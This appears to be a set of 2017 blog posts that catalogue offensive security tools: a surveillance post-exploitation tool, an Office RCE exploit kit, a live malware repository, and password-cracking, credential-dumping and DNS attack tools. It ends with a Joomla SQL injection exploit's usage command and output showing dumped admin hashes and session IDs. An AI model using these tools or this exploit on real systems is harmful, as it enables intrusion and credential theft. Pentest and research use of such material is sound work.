20/9/17

EggShell

About EggShell

EggShell is an iOS and macOS post-exploitation surveillance pentest tool written in Python. This tool creates one-line, multi-stage payloads that give you a command-line session with extra functionality. EggShell gives you the power and convenience of uploading/downloading files, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. Server communication features end-to-end encryption with 128-bit AES and the ability to handle multiple clients. This is a proof-of-concept pentest tool, intended for use on machines you own.
For detailed information and a how-to, visit http://lucasjackson.me/eggshell
Follow me on Twitter: @neoneggplant

19/9/17

Exploit toolkit CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy Python script which provides pentesters and security researchers a quick and effective way to test the Microsoft Office RCE. It can generate a malicious RTF/PPSX file and deliver a Metasploit / Meterpreter / other payload to a victim without any complex configuration.

https://github.com/bhdresh/CVE-2017-0199

A repository of LIVE malware for your own joy and pleasure

https://github.com/ytisf/theZoo


About

theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis, we have decided to gather all of them for you in an accessible and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev.


PASSWORDS

http://www.nyxbone.com/pentest/PASSWORDS.html



HASHES

» findmyhash - Try to crack different types of hashes using free online services.

» Hash Identifier - Software to identify the different types of hashes used to protect data and especially passwords.

» Password Cracking Suite - Hash cracking suite.



ATTACK ONLINE

» brut3k1t - Brute-force (dictionary-attack) tool that supports multiple protocols and services.

» Credmap - The Credential Mapper - is an open-source tool that was created to bring awareness to the dangers of credential reuse.

» THC-Hydra - Network Logon Cracker.

» Invoke-TheHash - Contains PowerShell functions for performing pass the hash WMI and SMB command execution. WMI and SMB services are accessed through .NET TCPClient connections.



ATTACK OFFLINE

» DPAT - Domain Password Audit Tool - is a Python script that generates password-use statistics from password hashes dumped from a domain controller, combined with a password crack file such as the oclHashcat.pot produced by oclHashcat during cracking.

» FireMasterCracker - Firefox Master Password Cracking Software.

» Hashcat - World's fastest password cracker.

» Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.

» John the Ripper - is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, and OpenVMS.

» JRecoverer - Another free password recovery tool for Linux, Oracle, MySQL, PostgreSQL, Microsoft SQL Server, among others.

» LaZagne - is an open-source application used to retrieve many of the passwords stored on a local computer.

» Pwdump7 - Password dumper for Windows.

» Quarks PwDump - Dump various types of Windows credentials without injecting into any process.

» Viper - is a brute-force password cracker.



GENERAL

» CeWL - Custom Word List generator.

» Crunch - is a wordlist generator that takes either a standard character set or one you specify; Crunch can generate all possible combinations and permutations.

» Offline NT Password & Registry Editor - is a utility to reset the password of any user that has a valid local account on your Windows system.

» Passgen for Julia 0.2.2 - is a replacement for Crunch and stands between Crunch and Hashcat in terms of speed and variation.

» passtrust - A Ruby based tool that converts a simple passphrase into a secure password.

DNS TOOLS

http://www.nyxbone.com/pentest/DNS.html

TOOLS:

» dig - (domain information groper) is a flexible tool for interrogating DNS name servers.

» DNSBruteforce - DNS brute-forcing utility that can query 2000 domains in 9 seconds.

» DNSChef - is a highly configurable DNS proxy for penetration testers and malware analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis, among other uses.

» dnsenum - is a Perl script that enumerates DNS information.

» DNSMap - is a subdomain brute-forcer for stealth enumeration.

» dnspredict

» DNSQuerySniffer - is a network sniffer utility that shows the DNS queries sent on your system.

» dnstwist - Domain name permutation engine for detecting typosquatting, phishing and corporate espionage.

» dnswalk - is a DNS debugger. It performs zone transfers of specified domains, and checks the database in numerous ways for internal consistency, as well as accuracy.

» DomainHostingView - is a utility for Windows that collects extensive information about a domain by using a series of DNS and WHOIS queries, and generates an HTML report that can be displayed in any web browser.

» Fierce - is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames for specified domains.

» iodine - lets you tunnel IPv4 data through a DNS server. This can be useful in situations where internet access is firewalled but DNS queries are allowed.

» JudasDNS - Nameserver DNS poisoning attacks made easy.

» PassiveDNS - a network sniffer that logs all DNS server replies for use in a passive DNS setup.

» QuickSetDNS - is a simple tool that allows you to easily change the DNS servers used for your Internet connection. You can set the desired DNS servers from the user interface, by choosing from a list of DNS servers that you defined, or from the command line, without displaying any user interface.

» ReverseRaider - is a domain scanner that uses various techniques, such as wordlist scanning to find a target's subdomains or reverse resolution for a range of IPs.

» SubBrute - is a DNS meta-query spider that enumerates the subdomains of a target domain.

Databases Penetration Testing

http://sqlmap.org/

https://github.com/Neohapsis/bbqsql

https://github.com/codingo/NoSQLMap

13/9/17

Exploit for Joomla 3.7.0 (CVE-2017-8917)


Another proof of concept exploit for Joomla, whoop-de-doo, this time a SQL Injection in 3.7.0.

Usage

Point the joomblah.py script at the vulnerable Joomla 3.7.0 install; it may take some time, but it will dump the users and session tables.
$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: rlbre_users
  -  Found table: tgukl_users
  -  Extracting users from rlbre_users
 [$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Extracting sessions from rlbre_session
 [$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Extracting users from tgukl_users
 [$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Extracting sessions from tgukl_session